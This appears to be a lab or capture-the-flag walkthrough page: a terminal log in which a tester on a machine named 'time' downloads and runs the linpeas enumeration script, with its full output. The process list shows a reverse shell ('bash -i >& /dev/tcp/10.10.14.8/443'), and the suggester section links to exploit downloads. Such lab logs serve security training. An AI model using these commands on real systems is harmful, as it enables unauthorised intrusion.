1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485 486 487 488 489 490 491 492 493 494 495 496 497 498 499 500 501 502 503 504 505 506 507 508 509 510 511 512 513 514 515 516 517 518 519 520 521 522 523 524 525 526 527 528 529 530 531 532 533 534 535 536 537 538 539 540 541 542 543 544 545 546 547 548 549 550 551 552 553 554 555 556 557 558 559 560 561 562 563 564 565 566 567 568 569 570 571 572 573 574 575 576 577 578 579 580 581 582 583 584 585 586 587 588 589 590 591 592 593 594 595 596 597 598 599 600 601 602 603 604 605 606 607 608 609 610 611 612 613 614 615 616 617 618 619 620 621 622 623 624 625 626 627 628 629 630 631 632 633 634 635 636 637 638 639 640 641 642 643 644 645 646 647 648 649 650 651 652 653 654 655 656 657 658 659 660 661 662 663 664 665 666 667 668 669 670 671 672 673 674 675 676 677 678 679 680 681 682 683 684 685 686 687 688 689 690 691 692 693 694 695 696 697 698 699 700 701 702 703 704 705 706 707 708 709 710 711 712 713 714 715 716 717 718 719 720 721 722 723 724 725 726 727 728 729 730 731 732 733 734 735 736 737 738 739 740 741 742 743 744 745 746 747 748 749 750 751 752 753 754 755 756 757 758 759 760 761 762 763 764 765 766 767 768 769 770 771 772 773 774 775 776 777 778 779 780 781 782 783 784 785 786 787 788 789 790 791 792 793 794 795 796 797 798 799 800 801 802 803 804 805 806 807 808 809 810 811 812 813 814 815 816 817 818 819 820 821 822 823 824 825 826 827 828 829 830 831 832 833 834 835 836 837 838 839 840 841 842 843 844 845 846 847 848 849 850 851 852 853 854 855 856 857 858 859 860 861 862 863 864 865 866 867 868 869 870 871 872 873 874 875 876 877 878 879 880 881 882 883 884 885 886 887 888 889 890 891 892 893 894 895 896 897 898 899 900 901 902 903 904 905 906 907 908 909 910 911 912 913 914 915 916 917 918 919 920 921 922 923 924 925 926 927 928 929 930 931 932 933 934 935 936 937 938 939 940 941 942 943 944 945 946 947 948 949 950 951 952 953 954 955 956 957 958 959 960 961 962 963 964 965 966 967 968 969 970 971 972 973 974 975 976 977 978 979 980 981 982 983 984 985 986 987 988 989 990 991 992 993 994 995 996 997 998 999 1000 1001 1002 1003 1004 1005 1006 1007 1008 1009 1010 1011 1012 1013 1014 1015 1016 1017 1018 1019 1020 1021 1022 1023 1024 1025 1026 1027 1028 1029 1030 1031 1032 1033 1034 1035 1036 1037 1038 1039 1040 1041 1042 1043 1044 1045 1046 1047 1048 1049 1050 1051 1052 1053 1054 1055 1056 1057 1058 1059 1060 1061 1062 1063 1064 1065 1066 1067 1068 1069 1070 1071 1072 1073 1074 1075 1076 1077 1078 1079 1080 1081 1082 1083 1084 1085 1086 1087 1088 1089 1090 1091 1092 1093 1094 1095 1096 1097 1098 1099 1100 1101 1102 1103 1104 1105 1106 1107 1108 1109 1110 1111 1112 1113 1114 1115 1116 1117 1118 1119 1120 1121 1122 1123 1124 1125 1126 1127 1128 1129 1130 1131 1132 1133 1134 1135 1136 1137 1138 1139 1140 1141 1142 1143 1144 1145 1146 1147 1148 1149 1150 1151 1152 1153 1154 1155 1156 1157 1158 1159 1160 1161 1162 1163 1164 1165 1166 1167 1168 1169 1170 1171 1172 1173 1174 1175 1176 1177 1178 1179 1180 1181 1182 1183 1184 1185 1186 1187 1188 1189 1190 1191 1192 1193 1194 1195 1196 1197 1198 1199 1200 1201 1202 1203 1204 1205 1206 1207 1208 1209 1210 1211 1212 1213 1214 1215 1216 1217 1218 1219 1220 1221 1222 1223 1224 1225 1226 1227 1228 1229 1230 1231 1232 1233 1234 1235 1236 1237 1238 1239 1240 1241 1242 1243 1244 1245 1246 1247 1248 1249 1250 1251 1252 1253 1254 1255 1256 1257 1258 1259 1260 1261 1262 1263 1264 1265 1266 1267 1268 1269 1270 1271 1272 1273 1274 1275 1276 1277 1278 1279 1280 1281 1282 1283 1284 1285 1286 1287 1288 1289 1290 1291 1292 1293 1294 1295 1296 1297 1298 1299 1300 1301 1302 1303 1304 1305 1306 1307 1308 1309 1310 1311 1312 1313 1314 1315 1316 1317 1318 1319 1320 1321 1322 1323 1324 1325 1326 1327 1328 1329 1330 1331 1332 1333 1334 1335 1336 1337 1338 1339 1340 1341 1342 1343 1344 1345 1346 1347 1348 1349 1350 1351 1352 1353 1354 1355 1356 1357 1358 1359 1360 1361 1362 1363 1364 1365 1366 1367 1368 1369 1370 1371 1372 1373 1374 1375 1376 1377 1378 1379 1380 1381 1382 1383 1384 1385 1386 1387 1388 1389 1390 1391 1392 1393 1394 1395 1396 1397 1398 1399 1400 1401 1402 1403 1404 1405 1406 1407 1408 1409 1410 1411 1412 1413 1414 1415 1416 1417 1418 1419 1420 1421 1422 1423 1424 1425 1426 1427 1428 1429 1430 1431 1432 1433 1434 1435 1436 1437 1438 1439 1440 1441 1442 1443 1444 1445 1446 1447 1448 1449 1450
| pericles@time:/tmp$ wget http://10.10.14.8/linpeas.sh wget http://10.10.14.8/linpeas.sh --2024-01-13 13:41:31-- http://10.10.14.8/linpeas.sh Connecting to 10.10.14.8:80... connected. HTTP request sent, awaiting response... 200 OK Length: 847920 (828K) [text/x-sh] Saving to: 'linpeas.sh'
0K .......... .......... .......... .......... .......... 6% 59.2K 13s 800K .......... .......... ........ 100% 3.75M=2.6s
2024-01-13 13:41:35 (322 KB/s) - 'linpeas.sh' saved [847920/847920]
pericles@time:/tmp$ ls ls hsperfdata_pericles linpeas.sh pericles@time:/tmp$
pericles@time:/tmp$ chmod +x linpeas.sh chmod +x linpeas.sh pericles@time:/tmp$ ./linpeas.sh ./linpeas.sh
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist LEGEND: RED/YELLOW: 95% a PE vector RED: You should take a look to it LightCyan: Users with console Blue: Users without console & mounted devs Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs) LightMagenta: Your username
Starting linpeas. Caching Writable Folders...
╔═══════════════════╗ ═══════════════════════════════╣ Basic information ╠═══════════════════════════════ ╚═══════════════════╝ OS: Linux version 5.4.0-52-generic (buildd@lgw01-amd64-060) (gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04)) User & Groups: uid=1000(pericles) gid=1000(pericles) groups=1000(pericles) Hostname: time Writable folder: /dev/shm [+] /usr/bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h) [+] /usr/bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h) [+] /usr/bin/nc is available for network discovery & port scanning (linpeas can discover hosts and scan ports, learn more with -h)
Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE ╔════════════════════╗ ══════════════════════════════╣ System Information ╠══════════════════════════════ ╚════════════════════╝ ╔══════════╣ Operative system ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation Linux version 5.4.0-52-generic (buildd@lgw01-amd64-060) (gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04)) Distributor ID: Ubuntu Description: Ubuntu 20.04 LTS Release: 20.04 Codename: focal
╔══════════╣ Sudo version ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation Sudo version 1.8.31
╔══════════╣ PATH ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
╔══════════╣ Date & uptime Sat Jan 13 13:42:29 UTC 2024 13:42:29 up 1:15, 0 users, load average: 0.56, 0.16, 0.23
╔══════════╣ Any sd*/disk* disk in /dev? (limit 20) disk sda sda1 sda2 sda3
╔══════════╣ Unmounted file-system? ╚ Check if you can mount umounted devices /dev/disk/by-uuid/692e1ce5-79a8-43ba-9894-f6778ef46612 / ext4 defaults 0 0 /dev/sda3 none swap sw 0 0
╔══════════╣ Environment ╚ Any private information inside environment variables? LESSOPEN=| /usr/bin/lesspipe %s HISTFILESIZE=0 SHLVL=2 OLDPWD=/home/pericles APACHE_RUN_DIR=/var/run/apache2 APACHE_PID_FILE=/var/run/apache2/apache2.pid JOURNAL_STREAM=9:31347 _=./linpeas.sh PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin INVOCATION_ID=f68ac5b076dd4071a0673d3ec6650994 APACHE_LOCK_DIR=/var/lock/apache2 LANG=C HISTSIZE=0 LS_COLORS= APACHE_RUN_GROUP=pericles APACHE_RUN_USER=pericles LESSCLOSE=/usr/bin/lesspipe %s %s APACHE_LOG_DIR=/var/log/apache2 PWD=/tmp HISTFILE=/dev/null
╔══════════╣ Searching Signature verification failed in dmesg ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation dmesg Not Found ╔══════════╣ Executing Linux Exploit Suggester ╚ https://github.com/mzet-/linux-exploit-suggester [+] [CVE-2022-2586] nft_object UAF
Details: https://www.openwall.com/lists/oss-security/2022/08/29/5 Exposure: probable Tags: [ ubuntu=(20.04) ]{kernel:5.12.13} Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1 Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2021-4034] PwnKit
Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt Exposure: probable Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt Exposure: probable Tags: mint=19,[ ubuntu=18|20 ], debian=10 Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt Exposure: probable Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10 Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html Exposure: probable Tags: [ ubuntu=20.04 ]{kernel:5.8.0-*} Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c Comments: ip_tables kernel module must be loaded
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/ https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/ Exposure: less probable Tags: ubuntu=(22.04){kernel:5.15.0-27-generic} Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2017-5618] setuid screen v4.5.0 LPE
Details: https://seclists.org/oss-sec/2017/q1/184 Exposure: less probable Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154
╔══════════╣ Executing Linux Exploit Suggester 2 ╚ https://github.com/jondonas/linux-exploit-suggester-2 ╔══════════╣ Protections ═╣ AppArmor enabled? .............. You do not have enough privilege to read the profile set. apparmor module is loaded. ═╣ AppArmor profile? .............. unconfined ═╣ is linuxONE? ................... s390x Not Found ═╣ grsecurity present? ............ grsecurity Not Found ═╣ PaX bins present? .............. PaX Not Found ═╣ Execshield enabled? ............ Execshield Not Found ═╣ SELinux enabled? ............... sestatus Not Found ═╣ Seccomp enabled? ............... disabled ═╣ User namespace? ................ enabled ═╣ Cgroup2 enabled? ............... enabled ═╣ Is ASLR enabled? ............... Yes ═╣ Printer? ....................... No ═╣ Is this a virtual machine? ..... Yes (vmware)
╔═══════════╗ ═══════════════════════════════════╣ Container ╠═══════════════════════════════════ ╚═══════════╝ ╔══════════╣ Container related tools present (if any): /snap/bin/lxc ╔══════════╣ Am I Containered? ╔══════════╣ Container details ═╣ Is this a container? ........... No ═╣ Any running containers? ........ No
╔═══════╗ ═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════ ╚═══════╝ ═╣ Google Cloud Platform? ............... No ═╣ AWS ECS? ............................. No ═╣ AWS EC2? ............................. No ═╣ AWS EC2 Beanstalk? ................... No ═╣ AWS Lambda? .......................... No ═╣ AWS Codebuild? ....................... No ═╣ DO Droplet? .......................... No ═╣ IBM Cloud VM? ........................ No ═╣ Azure VM? ............................ No ═╣ Azure APP? ........................... No
╔════════════════════════════════════════════════╗ ════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════ ╚════════════════════════════════════════════════╝ ╔══════════╣ Cleaned processes ╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation root 1 0.1 0.2 104152 11560 ? Ss 12:26 0:08 /sbin/init auto automatic-ubiquity noprompt root 446 0.2 2.0 170504 81044 ? S<s 12:26 0:11 /lib/systemd/systemd-journald root 474 0.1 0.1 21460 5548 ? Ss 12:26 0:06 /lib/systemd/systemd-udevd systemd+ 475 0.0 0.1 18544 7544 ? Ss 12:26 0:00 /lib/systemd/systemd-networkd └─(Caps) 0x0000000000003c00=cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw root 616 0.0 0.4 345796 18196 ? SLsl 12:26 0:02 /sbin/multipathd -d -s systemd+ 654 0.0 0.3 23912 12160 ? Ss 12:26 0:00 /lib/systemd/systemd-resolved systemd+ 656 0.0 0.1 90388 6376 ? Ssl 12:26 0:01 /lib/systemd/systemd-timesyncd └─(Caps) 0x0000000002000000=cap_sys_time root 679 0.0 0.2 47528 10420 ? Ss 12:26 0:00 /usr/bin/VGAuthService root 686 0.1 0.2 162008 8012 ? S<sl 12:26 0:06 /usr/bin/vmtoolsd root 764 0.0 0.2 239364 9580 ? Ssl 12:26 0:00 /usr/lib/accountsservice/accounts-daemon[0m message+ 765 0.0 0.1 7436 4632 ? Ss 12:26 0:01 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only └─(Caps) 0x0000000020000000=cap_audit_write root 792 0.0 0.0 81944 3716 ? Ssl 12:26 0:00 /usr/sbin/irqbalance --foreground root 798 0.0 0.4 29052 18132 ? Ss 12:26 0:00 /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers root 817 0.0 0.0 6812 2940 ? Ss 12:26 0:00 /usr/sbin/cron -f syslog 832 0.1 0.1 224324 5848 ? Ssl 12:26 0:05 /usr/sbin/rsyslogd -n -iNONE root 834 0.2 0.8 779380 33508 ? Ssl 12:26 0:13 /usr/lib/snapd/snapd root 841 0.0 0.1 16632 6160 ? Ss 12:26 0:00 /lib/systemd/systemd-logind daemon[0m 854 0.0 0.0 3792 2320 ? Ss 12:26 0:00 /usr/sbin/atd -f root 875 0.0 0.4 194032 18872 ? Ss 12:26 0:00 /usr/sbin/apache2 -k start pericles 968 0.0 0.3 194888 13092 ? S 12:26 0:00 _ /usr/sbin/apache2 -k start pericles 970 0.0 0.3 194896 13648 ? S 12:26 0:00 _ /usr/sbin/apache2 -k start pericles 972 0.0 0.3 194880 13692 ? S 12:26 0:00 _ /usr/sbin/apache2 -k start pericles 12826 0.0 0.0 2608 612 ? S 13:34 0:00 | _ sh -c /usr/bin/jruby /opt/json_project/parse.rb /dev/shm/payload2kCy7H 2>&1 pericles 12827 1.3 5.0 3604996 202560 ? Sl 13:34 0:06 | _ java -Xss2048k -Djffi.boot.library.path=/usr/share/jruby/lib/jni -Djava.security.egd=file:/dev/urandom -Xbootclasspath/a:/usr/share/jruby/lib/jruby.jar -classpath : -Djruby.home=/usr/share/jruby -Djruby.lib=/usr/share/jruby/lib -Djruby.script=jruby -Djruby.shell=/bin/sh -Ddebian.include.mri_vendor_libdir_in_load_path=true org.jruby.Main /opt/json_project/parse.rb /dev/shm/payload2kCy7H pericles 12888 0.0 0.0 3976 2992 ? S 13:34 0:00 | _ bash -c bash -i >& /dev/tcp/10.10.14.8/443 0>&1 pericles 12890 0.0 0.1 5172 4580 ? S 13:34 0:00 | _ bash -i pericles 14249 0.2 0.0 3420 2568 ? S 13:42 0:00 | _ /bin/sh ./linpeas.sh pericles 17559 0.0 0.0 3420 1028 ? S 13:42 0:00 | _ /bin/sh ./linpeas.sh pericles 17562 0.0 0.0 6204 3324 ? R 13:42 0:00 | | _ ps fauxwww pericles 17563 0.0 0.0 3420 1028 ? S 13:42 0:00 | _ /bin/sh ./linpeas.sh pericles 3355 0.0 0.3 194816 13504 ? S 12:39 0:00 _ /usr/sbin/apache2 -k start pericles 3380 0.0 0.3 194824 13088 ? S 12:39 0:00 _ /usr/sbin/apache2 -k start pericles 3384 0.0 0.3 194912 12912 ? S 12:39 0:00 _ /usr/sbin/apache2 -k start pericles 3387 0.0 0.3 194840 13628 ? S 12:39 0:00 _ /usr/sbin/apache2 -k start pericles 3595 0.0 0.2 194832 11652 ? S 12:40 0:00 _ /usr/sbin/apache2 -k start pericles 3623 0.0 0.2 194824 10532 ? S 12:40 0:00 _ /usr/sbin/apache2 -k start pericles 3624 0.0 0.3 194816 13344 ? S 12:40 0:00 _ /usr/sbin/apache2 -k start root 919 0.0 0.0 5828 1840 tty1 Ss+ 12:26 0:00 /sbin/agetty -o -p -- u --noclear tty1 linux root 940 0.0 0.2 236416 9216 ? Ssl 12:26 0:00 /usr/lib/policykit-1/polkitd --no-debug
╔══════════╣ Binary processes permissions (non 'root root' and not belonging to current user) ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation ╔══════════╣ Processes whose PPID belongs to a different user (not root) ╚ You will know if a user can somehow spawn processes as a different user Proc 475 with ppid 1 is run by user systemd-network but the ppid user is root Proc 654 with ppid 1 is run by user systemd-resolve but the ppid user is root Proc 656 with ppid 1 is run by user systemd-timesync but the ppid user is root Proc 765 with ppid 1 is run by user messagebus but the ppid user is root Proc 832 with ppid 1 is run by user syslog but the ppid user is root Proc 854 with ppid 1 is run by user daemon but the ppid user is root Proc 968 with ppid 875 is run by user pericles but the ppid user is root Proc 970 with ppid 875 is run by user pericles but the ppid user is root Proc 972 with ppid 875 is run by user pericles but the ppid user is root Proc 3355 with ppid 875 is run by user pericles but the ppid user is root Proc 3380 with ppid 875 is run by user pericles but the ppid user is root Proc 3384 with ppid 875 is run by user pericles but the ppid user is root Proc 3387 with ppid 875 is run by user pericles but the ppid user is root Proc 3595 with ppid 875 is run by user pericles but the ppid user is root Proc 3623 with ppid 875 is run by user pericles but the ppid user is root Proc 3624 with ppid 875 is run by user pericles but the ppid user is root
╔══════════╣ Files opened by processes belonging to other users ╚ This is usually empty because of the lack of privileges to read other user processes information COMMAND PID TID TASKCMD USER FD TYPE DEVICE SIZE/OFF NODE NAME
╔══════════╣ Processes with credentials in memory (root req) ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation gdm-password Not Found gnome-keyring-daemon Not Found lightdm Not Found vsftpd Not Found apache2 process found (dump creds from memory as root) sshd: process found (dump creds from memory as root)
╔══════════╣ Cron jobs ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation /usr/bin/crontab incrontab Not Found -rw-r--r-- 1 root root 1042 Feb 13 2020 /etc/crontab
/etc/cron.d: total 24 drwxr-xr-x 2 root root 4096 Dec 16 2021 . drwxr-xr-x 102 root root 4096 Dec 16 2021 .. -rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder -rw-r--r-- 1 root root 201 Feb 14 2020 e2scrub_all -rw-r--r-- 1 root root 712 Mar 27 2020 php -rw-r--r-- 1 root root 191 Apr 23 2020 popularity-contest
/etc/cron.daily: total 52 drwxr-xr-x 2 root root 4096 Dec 16 2021 . drwxr-xr-x 102 root root 4096 Dec 16 2021 .. -rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder -rwxr-xr-x 1 root root 539 Apr 13 2020 apache2 -rwxr-xr-x 1 root root 376 Dec 4 2019 apport -rwxr-xr-x 1 root root 1478 Apr 9 2020 apt-compat -rwxr-xr-x 1 root root 355 Dec 29 2017 bsdmainutils -rwxr-xr-x 1 root root 1187 Sep 5 2019 dpkg -rwxr-xr-x 1 root root 377 Jan 21 2019 logrotate -rwxr-xr-x 1 root root 1123 Feb 25 2020 man-db -rwxr-xr-x 1 root root 4574 Jul 18 2019 popularity-contest -rwxr-xr-x 1 root root 214 Apr 2 2020 update-notifier-common
/etc/cron.hourly: total 12 drwxr-xr-x 2 root root 4096 Dec 16 2021 . drwxr-xr-x 102 root root 4096 Dec 16 2021 .. -rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder
/etc/cron.monthly: total 12 drwxr-xr-x 2 root root 4096 Dec 16 2021 . drwxr-xr-x 102 root root 4096 Dec 16 2021 .. -rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder
/etc/cron.weekly: total 20 drwxr-xr-x 2 root root 4096 Dec 16 2021 . drwxr-xr-x 102 root root 4096 Dec 16 2021 .. -rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder -rwxr-xr-x 1 root root 813 Feb 25 2020 man-db -rwxr-xr-x 1 root root 211 Apr 2 2020 update-notifier-common
SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
╔══════════╣ Systemd PATH ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
╔══════════╣ Analyzing .service files ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation /etc/systemd/system/multi-user.target.wants/atd.service could be executing some relative path /etc/systemd/system/web_backup.service could be executing some relative path You can't write on systemd PATH
╔══════════╣ System timers ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers NEXT LEFT LAST PASSED UNIT ACTIVATES Sat 2024-01-13 13:42:41 UTC 2s left Sat 2024-01-13 13:42:31 UTC 8s ago timer_backup.timer timer_backup.service Sat 2024-01-13 13:47:40 UTC 5min left Tue 2021-02-09 14:42:14 UTC 2 years 11 months ago motd-news.timer motd-news.service Sat 2024-01-13 14:09:00 UTC 26min left Sat 2024-01-13 13:39:01 UTC 3min 38s ago phpsessionclean.timer phpsessionclean.service Sat 2024-01-13 15:45:40 UTC 2h 3min left Thu 2020-10-22 20:24:53 UTC 3 years 2 months ago fwupd-refresh.timer fwupd-refresh.service Sun 2024-01-14 00:00:00 UTC 10h left Sat 2024-01-13 12:26:38 UTC 1h 16min ago logrotate.timer logrotate.service Sun 2024-01-14 00:00:00 UTC 10h left Sat 2024-01-13 12:26:38 UTC 1h 16min ago man-db.timer man-db.service Sun 2024-01-14 00:14:19 UTC 10h left Thu 2020-10-22 18:44:20 UTC 3 years 2 months ago apt-daily.timer apt-daily.service Sun 2024-01-14 03:10:58 UTC 13h left Sat 2024-01-13 12:26:43 UTC 1h 15min ago e2scrub_all.timer e2scrub_all.service Sun 2024-01-14 06:51:53 UTC 17h left Sat 2024-01-13 13:00:42 UTC 41min ago apt-daily-upgrade.timer apt-daily-upgrade.service Sun 2024-01-14 12:41:31 UTC 22h left Sat 2024-01-13 12:41:31 UTC 1h 1min ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service Mon 2024-01-15 00:00:00 UTC 1 day 10h left Sat 2024-01-13 12:26:38 UTC 1h 16min ago fstrim.timer fstrim.service n/a n/a n/a n/a snapd.snap-repair.timer snapd.snap-repair.service
╔══════════╣ Analyzing .timer files ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers ╔══════════╣ Analyzing .socket files ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets /etc/systemd/system/sockets.target.wants/uuidd.socket is calling this writable listener: /run/uuidd/request /snap/core18/1705/lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket /snap/core18/1705/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket /snap/core18/1705/lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log /snap/core18/1705/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout /snap/core18/1705/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket /snap/core18/1705/lib/systemd/system/syslog.socket is calling this writable listener: /run/systemd/journal/syslog /snap/core18/1705/lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log /snap/core18/1705/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout /snap/core18/1705/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket /snap/core18/1885/lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket /snap/core18/1885/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket /snap/core18/1885/lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log /snap/core18/1885/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout /snap/core18/1885/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket /snap/core18/1885/lib/systemd/system/syslog.socket is calling this writable listener: /run/systemd/journal/syslog /snap/core18/1885/lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log /snap/core18/1885/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout /snap/core18/1885/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket /usr/lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
╔══════════╣ Unix Sockets Listening ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets sed: -e expression #1, char 0: no previous regular expression /org/kernel/linux/storage/multipathd /run/dbus/system_bus_socket └─(Read Write) /run/irqbalance//irqbalance792.sock └─(Read ) /run/irqbalance/irqbalance792.sock └─(Read ) /run/lvm/lvmpolld.socket /run/snapd-snap.socket └─(Read Write) /run/snapd.socket └─(Read Write) /run/systemd/journal/dev-log └─(Read Write) /run/systemd/journal/io.systemd.journal /run/systemd/journal/socket └─(Read Write) /run/systemd/journal/stdout └─(Read Write) /run/systemd/journal/syslog └─(Read Write) /run/systemd/notify └─(Read Write) /run/systemd/private └─(Read Write) /run/systemd/userdb/io.systemd.DynamicUser └─(Read Write) /run/udev/control /run/uuidd/request └─(Read Write) /run/vmware/guestServicePipe └─(Read Write) /var/run/vmware/guestServicePipe └─(Read Write) /var/snap/lxd/common/lxd/unix.socket
╔══════════╣ D-Bus config files ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus Possible weak user policy found on /etc/dbus-1/system.d/org.freedesktop.thermald.conf ( <policy group="power">)
